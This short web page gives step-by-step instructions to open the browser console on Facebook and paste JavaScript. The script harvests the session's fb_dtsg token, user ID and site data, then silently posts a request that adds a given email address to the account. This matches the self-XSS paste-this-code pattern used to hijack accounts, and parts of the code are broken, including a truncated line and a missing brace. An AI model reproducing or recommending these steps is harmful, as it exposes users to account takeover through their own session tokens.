1.Use chrome or edge browser to log in your account, then click the setting interface.

  1. Press F12 button or click the right mouse button then click Inspect , switch to console, copy and paste the following code, and then press Enter.

    var spinR = require([“SiteData”]).spin_r;
    var spinB = require([“SiteData”]).
    var spinT = require([“SiteData”]).spin_t;
    var jazoest = require([“SprinkleConfig”]).jazoest;
    var fbdtsg = require([“DTSGInitData”]).token;
    var userId = require([“CurrentUserInitialData”]).USER_ID;
    var hsi = require([“SiteData”]).hsi;
    var email = “fakemailtest@changemail.com”;
    var url = “https://www.facebook.com/add_contactpoint/dialog/submit/”;
    var data = “jazoest=22134&fb_dtsg=” + fbdtsg + “&next=&contactpoint=” + email + “&
    user=” + userId + “&a=1&dyn=&req=1&be=1&pc=PHASED%3ADEFAULT&dpr=1&rev=&s=&hsi=” + hsi + “&spin_r=” + spinR + “&spin_b=” + spinB + “&__spin_t=” + spinT;
    fetch(url, {
    method: ‘POST’,
    body: data,
    headers: {
    ‘Content-Type’: ‘application/x-www-form-urlencoded’
    }).then(e => e.text()).then(e => {})

    Change fakemailtest@changemail.com to your own email address here
  2. Refresh the setting page, you can see that the new email has been added.

    Click on the link to view Chinese version: